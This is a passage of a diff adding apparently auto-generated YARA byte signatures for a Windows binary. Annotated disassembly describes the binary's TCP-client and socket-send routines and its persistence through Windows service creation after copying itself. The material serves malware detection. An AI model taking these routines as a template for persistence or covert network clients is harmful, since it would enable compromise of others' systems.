+ .text:0x00401919 7423 jz 0x0040193e + .text:0x0040191b 8d55fc lea edx,dword [ebp - 4] + .text:0x0040191e 52 push edx + .text:0x0040191f e81cfeffff call 0x00401740 ;sub_00401740(local8) + .text:0x00401924 83c404 add esp,4 + .text:0x00401927 
8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x0040192d 50 push eax + .text:0x0040192e ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x004018b8>) + .text:0x00401934 b801000000 mov eax,1 + .text:0x00401939 e99a000000 jmp 0x004019d8 + .text:0x0040193e loc_0040193e: [1 XREFS] + .text:0x0040193e c745f800000000 mov dword [ebp - 8],0 + .text:0x00401945 loc_00401945: [2 XREFS] + .text:0x00401945 6a00 push 0 + .text:0x00401947 8b4df8 mov ecx,dword [ebp - 8] + .text:0x0040194a 51 push ecx + .text:0x0040194b 8d95f8fdffff lea edx,dword [ebp - 520] + .text:0x00401951 52 push edx + .text:0x00401952 8b45fc mov eax,dword [ebp - 4] + .text:0x00401955 50 push eax + .text:0x00401956 ff154cb14000 call dword [0x0040b14c] ;ws2_32.send(0,local524,0xfefefefe,0) + .text:0x0040195c 8985ecfdffff mov dword [ebp - 532],eax + .text:0x00401962 83bdecfdffffff cmp dword [ebp - 532],0xffffffff + .text:0x00401969 7520 jnz 0x0040198b + .text:0x0040196b 8d4dfc lea ecx,dword [ebp - 4] + .text:0x0040196e 51 push ecx + .text:0x0040196f e8ccfdffff call 0x00401740 ;sub_00401740(local8) + .text:0x00401974 83c404 add esp,4 + .text:0x00401977 8b95f4fdffff mov edx,dword [ebp - 524] + .text:0x0040197d 52 push edx + .text:0x0040197e ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x004018b8>) + .text:0x00401984 b801000000 mov eax,1 + .text:0x00401989 eb4d jmp 0x004019d8 + .text:0x0040198b loc_0040198b: [1 XREFS] + .text:0x0040198b 8b85f0fdffff mov eax,dword [ebp - 528] + .text:0x00401991 0385ecfdffff add eax,dword [ebp - 532] + .text:0x00401997 8985f0fdffff mov dword [ebp - 528],eax + .text:0x0040199d 8b8df0fdffff mov ecx,dword [ebp - 528] + .text:0x004019a3 3b4df8 cmp ecx,dword [ebp - 8] + .text:0x004019a6 729d jc 0x00401945 + .text:0x004019a8 837df800 cmp dword [ebp - 8],0 + .text:0x004019ac 0f8731ffffff ja 0x004018e3 + .text:0x004019b2 8b95f4fdffff mov edx,dword [ebp - 524] + .text:0x004019b8 52 push edx + .text:0x004019b9 ff1564b04000 call dword [0x0040b064] 
;kernel32.CloseHandle(<0x004018b8>) + .text:0x004019bf 8d45fc lea eax,dword [ebp - 4] + .text:0x004019c2 50 push eax + .text:0x004019c3 e878fdffff call 0x00401740 ;sub_00401740(local8) + .text:0x004019c8 83c404 add esp,4 + .text:0x004019cb 85c0 test eax,eax + .text:0x004019cd 7407 jz 0x004019d6 + .text:0x004019cf b801000000 mov eax,1 + .text:0x004019d4 eb02 jmp 0x004019d8 + .text:0x004019d6 loc_004019d6: [1 XREFS] + .text:0x004019d6 33c0 xor eax,eax + .text:0x004019d8 loc_004019d8: [5 XREFS] + .text:0x004019d8 8be5 mov esp,ebp + .text:0x004019da 5d pop ebp + .text:0x004019db c3 ret + */ + $c51 = { 55 8B EC 81 EC 14 02 00 00 C7 45 ?? 00 00 00 00 8B 45 ?? 50 8B 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 6A 00 8D 55 ?? 52 68 00 02 00 00 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 83 F8 26 74 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 6A 00 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 72 ?? 83 7D ?? 00 0F 87 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 
33 C0 8B E5 5D C3 } + /* +function at 0x00401640@b94af4a4d4af6eac81fc135abda1c40c with 4 features: + - act as TCP client + - connect TCP socket + - initialize Winsock library + - resolve DNS + .text:0x00401640 + .text:0x00401640 FUNC: int cdecl sub_00401640( int arg0, int arg1, int arg2, ) [8 XREFS] + .text:0x00401640 + .text:0x00401640 Stack Variables: (offset from initial top of stack) + .text:0x00401640 12: int arg2 + .text:0x00401640 8: int arg1 + .text:0x00401640 4: int arg0 + .text:0x00401640 -404: int local404 + .text:0x00401640 -408: int local408 + .text:0x00401640 -420: int local420 + .text:0x00401640 -422: int local422 + .text:0x00401640 -424: int local424 + .text:0x00401640 + .text:0x00401640 55 push ebp + .text:0x00401641 8bec mov ebp,esp + .text:0x00401643 81eca4010000 sub esp,420 + .text:0x00401649 8b4508 mov eax,dword [ebp + 8] + .text:0x0040164c c700ffffffff mov dword [eax],0xffffffff + .text:0x00401652 8d8d70feffff lea ecx,dword [ebp - 400] + .text:0x00401658 51 push ecx + .text:0x00401659 6802020000 push 514 + .text:0x0040165e ff1544b14000 call dword [0x0040b144] ;ws2_32.WSAStartup(514,local404) + .text:0x00401664 85c0 test eax,eax + .text:0x00401666 740a jz 0x00401672 + .text:0x00401668 b801000000 mov eax,1 + .text:0x0040166d e9bb000000 jmp 0x0040172d + .text:0x00401672 loc_00401672: [1 XREFS] + .text:0x00401672 8b550c mov edx,dword [ebp + 12] + .text:0x00401675 52 push edx + .text:0x00401676 ff1548b14000 call dword [0x0040b148] ;ws2_32.gethostbyname(arg1) + .text:0x0040167c 89856cfeffff mov dword [ebp - 404],eax + .text:0x00401682 83bd6cfeffff00 cmp dword [ebp - 404],0 + .text:0x00401689 7510 jnz 0x0040169b + .text:0x0040168b ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401691 b801000000 mov eax,1 + .text:0x00401696 e992000000 jmp 0x0040172d + .text:0x0040169b loc_0040169b: [1 XREFS] + .text:0x0040169b 6a06 push 6 + .text:0x0040169d 6a01 push 1 + .text:0x0040169f 6a02 push 2 + .text:0x004016a1 ff1550b14000 call dword 
[0x0040b150] ;ws2_32.socket(2,1,6) + .text:0x004016a7 8b4d08 mov ecx,dword [ebp + 8] + .text:0x004016aa 8901 mov dword [ecx],eax + .text:0x004016ac 8b5508 mov edx,dword [ebp + 8] + .text:0x004016af 833aff cmp dword [edx],0xffffffff + .text:0x004016b2 750d jnz 0x004016c1 + .text:0x004016b4 ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x004016ba b801000000 mov eax,1 + .text:0x004016bf eb6c jmp 0x0040172d + .text:0x004016c1 loc_004016c1: [1 XREFS] + .text:0x004016c1 66c7855cfeffff02 mov word [ebp - 420],2 + .text:0x004016ca 8b856cfeffff mov eax,dword [ebp - 404] + .text:0x004016d0 8b480c mov ecx,dword [eax + 12] + .text:0x004016d3 8b11 mov edx,dword [ecx] + .text:0x004016d5 8b02 mov eax,dword [edx] + .text:0x004016d7 898560feffff mov dword [ebp - 416],eax + .text:0x004016dd 668b4d10 mov cx,word [ebp + 16] + .text:0x004016e1 51 push ecx + .text:0x004016e2 ff1554b14000 call dword [0x0040b154] ;ws2_32.htons(0x6161500f) + .text:0x004016e8 6689855efeffff mov word [ebp - 418],ax + .text:0x004016ef 6a10 push 16 + .text:0x004016f1 8d955cfeffff lea edx,dword [ebp - 420] + .text:0x004016f7 52 push edx + .text:0x004016f8 8b4508 mov eax,dword [ebp + 8] + .text:0x004016fb 8b08 mov ecx,dword [eax] + .text:0x004016fd 51 push ecx + .text:0x004016fe ff1558b14000 call dword [0x0040b158] ;ws2_32.connect(0x61616161,local424,16) + .text:0x00401704 83f8ff cmp eax,0xffffffff + .text:0x00401707 7522 jnz 0x0040172b + .text:0x00401709 8b5508 mov edx,dword [ebp + 8] + .text:0x0040170c 8b02 mov eax,dword [edx] + .text:0x0040170e 50 push eax + .text:0x0040170f ff155cb14000 call dword [0x0040b15c] ;ws2_32.closesocket(0x61616161) + .text:0x00401715 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401718 c701ffffffff mov dword [ecx],0xffffffff + .text:0x0040171e ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401724 b801000000 mov eax,1 + .text:0x00401729 eb02 jmp 0x0040172d + .text:0x0040172b loc_0040172b: [1 XREFS] + .text:0x0040172b 33c0 xor eax,eax + 
.text:0x0040172d loc_0040172d: [4 XREFS] + .text:0x0040172d 8be5 mov esp,ebp + .text:0x0040172f 5d pop ebp + .text:0x00401730 c3 ret + */ + $c52 = { 55 8B EC 81 EC A4 01 00 00 8B 45 ?? C7 00 FF FF FF FF 8D 8D ?? ?? ?? ?? 51 68 02 02 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 06 6A 01 6A 02 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 55 ?? 83 3A FF 75 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 66 C7 85 ?? ?? ?? ?? 02 00 8B 85 ?? ?? ?? ?? 8B 48 ?? 8B 11 8B 02 89 85 ?? ?? ?? ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 6A 10 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 8B 08 51 FF 15 ?? ?? ?? ?? 83 F8 FF 75 ?? 8B 55 ?? 8B 02 50 FF 15 ?? ?? ?? ?? 8B 4D ?? C7 01 FF FF FF FF FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 33 C0 8B E5 5D C3 } + /* +function at 0x00402600@b94af4a4d4af6eac81fc135abda1c40c with 5 features: + - copy file + - create service + - modify service + - persist via Windows service + - query environment variable + .text:0x00402600 + .text:0x00402600 FUNC: int thiscall_caller sub_00402600( void * ecx, int arg1, ) [4 XREFS] + .text:0x00402600 + .text:0x00402600 Stack Variables: (offset from initial top of stack) + .text:0x00402600 4: int arg1 + .text:0x00402600 -1028: int local1028 + .text:0x00402600 -1032: int local1032 + .text:0x00402600 -2056: int local2056 + .text:0x00402600 -3080: int local3080 + .text:0x00402600 -4104: int local4104 + .text:0x00402600 -5128: int local5128 + .text:0x00402600 -5132: int local5132 + .text:0x00402600 + .text:0x00402600 55 push ebp + .text:0x00402601 8bec mov ebp,esp + .text:0x00402603 b808140000 mov eax,0x00001408 + .text:0x00402608 e8a3080000 call 0x00402eb0 ;__alloca_probe() + .text:0x0040260d 53 push ebx + .text:0x0040260e 56 push esi + .text:0x0040260f 57 push edi + .text:0x00402610 6800040000 push 1024 + .text:0x00402615 8d85fcebffff lea eax,dword [ebp - 5124] + .text:0x0040261b 50 push 
eax + .text:0x0040261c e88fffffff call 0x004025b0 ;sub_004025b0(local5128) + .text:0x00402621 83c408 add esp,8 + .text:0x00402624 85c0 test eax,eax + .text:0x00402626 740a jz 0x00402632 + .text:0x00402628 b801000000 mov eax,1 + .text:0x0040262d e9c3020000 jmp 0x004028f5 + .text:0x00402632 loc_00402632: [1 XREFS] + .text:0x00402632 bf34c14000 mov edi,0x0040c134 + .text:0x00402637 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040263d 83c9ff or ecx,0xffffffff + .text:0x00402640 33c0 xor eax,eax + .text:0x00402642 f2ae repnz: scasb + .text:0x00402644 f7d1 not ecx + .text:0x00402646 2bf9 sub edi,ecx + .text:0x00402648 8bf7 mov esi,edi + .text:0x0040264a 8bc1 mov eax,ecx + .text:0x0040264c 8bfa mov edi,edx + .text:0x0040264e c1e902 shr ecx,2 + .text:0x00402651 f3a5 rep: movsd + .text:0x00402653 8bc8 mov ecx,eax + .text:0x00402655 83e103 and ecx,3 + .text:0x00402658 f3a4 rep: movsb + .text:0x0040265a 8dbdfcebffff lea edi,dword [ebp - 5124] + .text:0x00402660 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402666 83c9ff or ecx,0xffffffff + .text:0x00402669 33c0 xor eax,eax + .text:0x0040266b f2ae repnz: scasb + .text:0x0040266d f7d1 not ecx + .text:0x0040266f 2bf9 sub edi,ecx + .text:0x00402671 8bf7 mov esi,edi + .text:0x00402673 8bd9 mov ebx,ecx + .text:0x00402675 8bfa mov edi,edx + .text:0x00402677 83c9ff or ecx,0xffffffff + .text:0x0040267a 33c0 xor eax,eax + .text:0x0040267c f2ae repnz: scasb + .text:0x0040267e 83c7ff add edi,0xffffffff + .text:0x00402681 8bcb mov ecx,ebx + .text:0x00402683 c1e902 shr ecx,2 + .text:0x00402686 f3a5 rep: movsd + .text:0x00402688 8bcb mov ecx,ebx + .text:0x0040268a 83e103 and ecx,3 + .text:0x0040268d f3a4 rep: movsb + .text:0x0040268f bf2cc14000 mov edi,0x0040c12c + .text:0x00402694 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040269a 83c9ff or ecx,0xffffffff + .text:0x0040269d 33c0 xor eax,eax + .text:0x0040269f f2ae repnz: scasb + .text:0x004026a1 f7d1 not ecx + .text:0x004026a3 2bf9 sub edi,ecx + .text:0x004026a5 8bf7 
mov esi,edi + .text:0x004026a7 8bd9 mov ebx,ecx + .text:0x004026a9 8bfa mov edi,edx + .text:0x004026ab 83c9ff or ecx,0xffffffff + .text:0x004026ae 33c0 xor eax,eax + .text:0x004026b0 f2ae repnz: scasb + .text:0x004026b2 83c7ff add edi,0xffffffff + .text:0x004026b5 8bcb mov ecx,ebx + .text:0x004026b7 c1e902 shr ecx,2 + .text:0x004026ba f3a5 rep: movsd + .text:0x004026bc 8bcb mov ecx,ebx + .text:0x004026be 83e103 and ecx,3 + .text:0x004026c1 f3a4 rep: movsb + .text:0x004026c3 683f000f00 push 0x000f003f + .text:0x004026c8 6a00 push 0 + .text:0x004026ca 6a00 push 0 + .text:0x004026cc ff1500b04000 call dword [0x0040b000] ;advapi32.OpenSCManagerA(0,0,0x000f003f) + .text:0x004026d2 8985fcfbffff mov dword [ebp - 1028],eax + .text:0x004026d8 83bdfcfbffff00 cmp dword [ebp - 1028],0 + .text:0x004026df 750a jnz 0x004026eb + .text:0x004026e1 b801000000 mov eax,1 + .text:0x004026e6 e90a020000 jmp 0x004028f5 + .text:0x004026eb loc_004026eb: [1 XREFS] + .text:0x004026eb 68ff010f00 push 0x000f01ff + .text:0x004026f0 8b4508 mov eax,dword [ebp + 8] + .text:0x004026f3 50 push eax + .text:0x004026f4 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x004026fa 51 push ecx + .text:0x004026fb ff1504b04000 call dword [0x0040b004] ;advapi32.OpenServiceA(advapi32.OpenSCManagerA(0,0,0x000f003f),arg1,0x000f01ff) + .text:0x00402701 8985f8ebffff mov dword [ebp - 5128],eax + .text:0x00402707 83bdf8ebffff00 cmp dword [ebp - 5128],0 + .text:0x0040270e 746d jz 0x0040277d + .text:0x00402710 6a00 push 0 + .text:0x00402712 6a00 push 0 + .text:0x00402714 6a00 push 0 + .text:0x00402716 6a00 push 0 + .text:0x00402718 6a00 push 0 + .text:0x0040271a 6a00 push 0 + .text:0x0040271c 8d95fcf7ffff lea edx,dword [ebp - 2052] + .text:0x00402722 52 push edx + .text:0x00402723 6aff push 0xffffffff + .text:0x00402725 6a02 push 2 + .text:0x00402727 6aff push 0xffffffff + .text:0x00402729 8b85f8ebffff mov eax,dword [ebp - 5128] + .text:0x0040272f 50 push eax + .text:0x00402730 ff1508b04000 call dword [0x0040b008] 
;advapi32.ChangeServiceConfigA(advapi32.OpenServiceA(<0x004026cc>,arg1,0x000f01ff),0xffffffff,2,0xffffffff,local2056,0,0,0,0,0,0) + .text:0x00402736 85c0 test eax,eax + .text:0x00402738 7524 jnz 0x0040275e + .text:0x0040273a 8b8df8ebffff mov ecx,dword [ebp - 5128] + .text:0x00402740 51 push ecx + .text:0x00402741 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004026fb>) + .text:0x00402747 8b95fcfbffff mov edx,dword [ebp - 1028] + .text:0x0040274d 52 push edx + .text:0x0040274e ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004026cc>) + .text:0x00402754 b801000000 mov eax,1 + .text:0x00402759 e997010000 jmp 0x004028f5 + .text:0x0040275e loc_0040275e: [1 XREFS] + .text:0x0040275e 8b85f8ebffff mov eax,dword [ebp - 5128] + .text:0x00402764 50 push eax + .text:0x00402765 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004026fb>) + .text:0x0040276b 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x00402771 51 push ecx + .text:0x00402772 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004026cc>) + .text:0x00402778 e9ce000000 jmp 0x0040284b + .text:0x0040277d loc_0040277d: [1 XREFS] + .text:0x0040277d 8b7d08 mov edi,dword [ebp + 8] + .text:0x00402780 8d95fcf3ffff lea edx,dword [ebp - 3076] + .text:0x00402786 83c9ff or ecx,0xffffffff + .text:0x00402789 33c0 xor eax,eax + .text:0x0040278b f2ae repnz: scasb + .text:0x0040278d f7d1 not ecx + .text:0x0040278f 2bf9 sub edi,ecx + .text:0x00402791 8bf7 mov esi,edi + .text:0x00402793 8bc1 mov eax,ecx + .text:0x00402795 8bfa mov edi,edx + .text:0x00402797 c1e902 shr ecx,2 + .text:0x0040279a f3a5 rep: movsd + .text:0x0040279c 8bc8 mov ecx,eax + .text:0x0040279e 83e103 and ecx,3 + .text:0x004027a1 f3a4 rep: movsb + .text:0x004027a3 bf18c14000 mov edi,0x0040c118 + .text:0x004027a8 8d95fcf3ffff lea edx,dword [ebp - 3076] + .text:0x004027ae 83c9ff or ecx,0xffffffff + .text:0x004027b1 33c0 xor eax,eax + .text:0x004027b3 f2ae repnz: scasb + 
.text:0x004027b5 f7d1 not ecx + .text:0x004027b7 2bf9 sub edi,ecx + .text:0x004027b9 8bf7 mov esi,edi + .text:0x004027bb 8bd9 mov ebx,ecx + .text:0x004027bd 8bfa mov edi,edx + .text:0x004027bf 83c9ff or ecx,0xffffffff + .text:0x004027c2 33c0 xor eax,eax + .text:0x004027c4 f2ae repnz: scasb + .text:0x004027c6 83c7ff add edi,0xffffffff + .text:0x004027c9 8bcb mov ecx,ebx + .text:0x004027cb c1e902 shr ecx,2 + .text:0x004027ce f3a5 rep: movsd + .text:0x004027d0 8bcb mov ecx,ebx + .text:0x004027d2 83e103 and ecx,3 + .text:0x004027d5 f3a4 rep: movsb + .text:0x004027d7 6a00 push 0 + .text:0x004027d9 6a00 push 0 + .text:0x004027db 6a00 push 0 + .text:0x004027dd 6a00 push 0 + .text:0x004027df 6a00 push 0 + .text:0x004027e1 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x004027e7 50 push eax + .text:0x004027e8 6a01 push 1 + .text:0x004027ea 6a02 push 2 + .text:0x004027ec 6a20 push 32 + .text:0x004027ee 68ff010f00 push 0x000f01ff + .text:0x004027f3 8d8dfcf3ffff lea ecx,dword [ebp - 3076] + .text:0x004027f9 51 push ecx + .text:0x004027fa 8b5508 mov edx,dword [ebp + 8] + .text:0x004027fd 52 push edx + .text:0x004027fe 8b85fcfbffff mov eax,dword [ebp - 1028] + .text:0x00402804 50 push eax + .text:0x00402805 ff1510b04000 call dword [0x0040b010] ;advapi32.CreateServiceA(<0x004026cc>,arg1,local3080,0x000f01ff,32,2,1,local1028,0,0,0,0,0) + .text:0x0040280b 8985f8ebffff mov dword [ebp - 5128],eax + .text:0x00402811 83bdf8ebffff00 cmp dword [ebp - 5128],0 + .text:0x00402818 7517 jnz 0x00402831 + .text:0x0040281a 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x00402820 51 push ecx + .text:0x00402821 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004026cc>) + .text:0x00402827 b801000000 mov eax,1 + .text:0x0040282c e9c4000000 jmp 0x004028f5 + .text:0x00402831 loc_00402831: [1 XREFS] + .text:0x00402831 8b95f8ebffff mov edx,dword [ebp - 5128] + .text:0x00402837 52 push edx + .text:0x00402838 ff150cb04000 call dword [0x0040b00c] 
;advapi32.CloseServiceHandle(advapi32.CreateServiceA(<0x004026cc>,arg1,local3080,0x000f01ff,32,2,1,local1028,0,0,0,0,0)) + .text:0x0040283e 8b85fcfbffff mov eax,dword [ebp - 1028] + .text:0x00402844 50 push eax + .text:0x00402845 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004026cc>) + .text:0x0040284b loc_0040284b: [1 XREFS] + .text:0x0040284b 6800040000 push 1024 + .text:0x00402850 8d8dfcf7ffff lea ecx,dword [ebp - 2052] + .text:0x00402856 51 push ecx + .text:0x00402857 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040285d 52 push edx + .text:0x0040285e ff1530b04000 call dword [0x0040b030] ;kernel32.ExpandEnvironmentStringsA(local1028,local2056,1024) + .text:0x00402864 85c0 test eax,eax + .text:0x00402866 750a jnz 0x00402872 + .text:0x00402868 b801000000 mov eax,1 + .text:0x0040286d e983000000 jmp 0x004028f5 + .text:0x00402872 loc_00402872: [1 XREFS] + .text:0x00402872 6800040000 push 1024 + .text:0x00402877 8d85fcefffff lea eax,dword [ebp - 4100] + .text:0x0040287d 50 push eax + .text:0x0040287e 6a00 push 0 + .text:0x00402880 ff1538b04000 call dword [0x0040b038] ;kernel32.GetModuleFileNameA(0,local4104,1024) + .text:0x00402886 85c0 test eax,eax + .text:0x00402888 7507 jnz 0x00402891 + .text:0x0040288a b801000000 mov eax,1 + .text:0x0040288f eb64 jmp 0x004028f5 + .text:0x00402891 loc_00402891: [1 XREFS] + .text:0x00402891 6a00 push 0 + .text:0x00402893 8d8dfcf7ffff lea ecx,dword [ebp - 2052] + .text:0x00402899 51 push ecx + .text:0x0040289a 8d95fcefffff lea edx,dword [ebp - 4100] + .text:0x004028a0 52 push edx + .text:0x004028a1 ff1534b04000 call dword [0x0040b034] ;kernel32.CopyFileA(local4104,local2056,0) + .text:0x004028a7 85c0 test eax,eax + .text:0x004028a9 7507 jnz 0x004028b2 + .text:0x004028ab b801000000 mov eax,1 + .text:0x004028b0 eb43 jmp 0x004028f5 + .text:0x004028b2 loc_004028b2: [1 XREFS] + .text:0x004028b2 8d85fcf7ffff lea eax,dword [ebp - 2052] + .text:0x004028b8 50 push eax + .text:0x004028b9 e8f2ecffff call 
0x004015b0 ;sub_004015b0(local2056,local2056) + .text:0x004028be 83c404 add esp,4 + .text:0x004028c1 85c0 test eax,eax + .text:0x004028c3 7407 jz 0x004028cc + .text:0x004028c5 b801000000 mov eax,1 + .text:0x004028ca eb29 jmp 0x004028f5 + .text:0x004028cc loc_004028cc: [1 XREFS] + .text:0x004028cc 6814c14000 push 0x0040c114 + .text:0x004028d1 6810c14000 push 0x0040c110 + .text:0x004028d6 68e8c04000 push 0x0040c0e8 + .text:0x004028db 68e4c04000 push 0x0040c0e4 + .text:0x004028e0 e88be7ffff call 0x00401070 ;sub_00401070(0x0040c0e4,0x0040c0e8,0x0040c110,0x0040c114) + .text:0x004028e5 83c410 add esp,16 + .text:0x004028e8 85c0 test eax,eax + .text:0x004028ea 7407 jz 0x004028f3 + .text:0x004028ec b801000000 mov eax,1 + .text:0x004028f1 eb02 jmp 0x004028f5 + .text:0x004028f3 loc_004028f3: [1 XREFS] + .text:0x004028f3 33c0 xor eax,eax + .text:0x004028f5 loc_004028f5: [9 XREFS] + .text:0x004028f5 5f pop edi + .text:0x004028f6 5e pop esi + .text:0x004028f7 5b pop ebx + .text:0x004028f8 8be5 mov esp,ebp + .text:0x004028fa 5d pop ebp + .text:0x004028fb c3 ret + */ + $c53 = { 55 8B EC B8 08 14 00 00 E8 ?? ?? ?? ?? 53 56 57 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF 34 C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8D BD ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 2C C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 68 FF 01 0F 00 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? 6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 8D 95 ?? ?? ?? ?? 52 6A FF 6A 02 6A FF 8B 85 ?? ?? ?? ?? 50 FF 15 ?? 
?? ?? ?? 85 C0 75 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7D ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 BF 18 C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 6A 00 6A 00 6A 00 6A 00 6A 00 8D 85 ?? ?? ?? ?? 50 6A 01 6A 02 6A 20 68 FF 01 0F 00 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 6A 00 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 6A 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 68 14 C1 40 00 68 10 C1 40 00 68 E8 C0 40 00 68 E4 C0 40 00 E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 ?? B8 01 00 00 00 EB ?? 
